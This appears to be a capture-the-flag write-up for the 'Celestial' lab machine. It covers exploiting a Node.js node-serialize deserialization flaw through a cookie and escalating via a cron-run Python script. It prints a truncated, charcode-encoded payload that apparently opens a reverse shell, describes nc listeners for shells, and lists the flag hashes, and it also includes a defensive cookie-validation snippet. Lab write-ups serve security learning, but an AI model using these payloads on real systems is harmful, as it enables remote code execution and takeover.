Celestial

Celestial - 10.10.10.85

Target Enumeration:

OS: Linux
IP: 10.10.10.85
User: 9a093cd22ce86b7f41db4116e80d0b0f
Root: ba1d0019200a54e370ca151007a8095a

Ports / Services / Software Versions Running

3000/tcp open http Node.js Express framework

Vulnerability Exploited:

Nodejs Deserialization bug

Privilege Escalation:

Python script running as root from the user's Documents folder

Exploiting the host:

Nmap
Visiting in browser:
Decoding the cookie gives you:
Checking for vulnerabilities in Node.js, we found:
Download nodejsshell.py and run it:
Copy the output to a file and modify it so that it replicates this whole string, following the guide at the link:
{"rce":"_$ND_FUNC$_function (){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,--SNIP-6,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()"}
Encode this in base64 and replace the cookie.
Set up a nc listener on 443 and send the request.
Your listener will now spawn a shell.
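As an added example (not part of the original writeup), this is the defender-side check for the bug above: decode the base64 profile cookie, parse it as plain JSON, and reject any value carrying node-serialize's `_$ND_FUNC$_` function marker instead of ever passing untrusted input to unserialize(). The cookie name, field names and sample values are constructed.

```javascript
// Added example: validate a base64-encoded profile cookie before any
// deserialization. JSON.parse only builds data, so nothing here can run code;
// node-serialize's unserialize() is never called on the cookie.
const FUNC_MARKER = '_$ND_FUNC$_';

// Walk a parsed JSON value and collect every string carrying the marker,
// returning the key path (e.g. "rce", "profile.name") so the log entry is actionable.
function findFunctionMarkers(value, path = '', findings = []) {
  if (typeof value === 'string') {
    if (value.startsWith(FUNC_MARKER)) findings.push(path || '<root>');
  } else if (Array.isArray(value)) {
    value.forEach((v, i) => findFunctionMarkers(v, `${path}[${i}]`, findings));
  } else if (value && typeof value === 'object') {
    for (const [k, v] of Object.entries(value)) {
      findFunctionMarkers(v, path ? `${path}.${k}` : k, findings);
    }
  }
  return findings;
}

// Decode and validate the cookie. Returns { ok, profile } or { ok, reason, findings }.
// Note: Buffer.from(..., 'base64') silently skips invalid characters, so a
// garbage cookie surfaces as a JSON parse failure rather than a base64 error.
function parseProfileCookie(cookieB64) {
  const text = Buffer.from(cookieB64, 'base64').toString('utf8');
  let profile;
  try {
    profile = JSON.parse(text);
  } catch (e) {
    return { ok: false, reason: 'cookie is not valid JSON', findings: [] };
  }
  const findings = findFunctionMarkers(profile);
  if (findings.length > 0) {
    // Log-worthy: a legitimate profile never contains a serialized function.
    return { ok: false, reason: 'serialized function marker in cookie', findings };
  }
  return { ok: true, profile };
}

// Constructed sample cookies (not taken from the box); the tainted one uses an inert body.
const benignCookie = Buffer.from(JSON.stringify({ username: 'alice', num: '2' })).toString('base64');
const taintedCookie = Buffer.from(
  JSON.stringify({ rce: `${FUNC_MARKER}function (){ return 1 }()` })
).toString('base64');

console.log(parseProfileCookie(benignCookie));
console.log(parseProfileCookie(taintedCookie));
```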
Located in the Documents folder is script.py.
This appears to run every 5 minutes and overwrites itself, so you are unable to inject a reverse Python shell without it breaking. Also found is output.txt.
This holds the output from script.py, and while we have not found a crontab for root, we can assume that whatever is in script.py is executed every 5 minutes as the root user, since it overwrites output.txt.
So append to the end of the file:
Then set up a listener on 444 and wait around 5 minutes to get the root shell.
Checking root's crontab shows that it is overwriting the file every 5 minutes.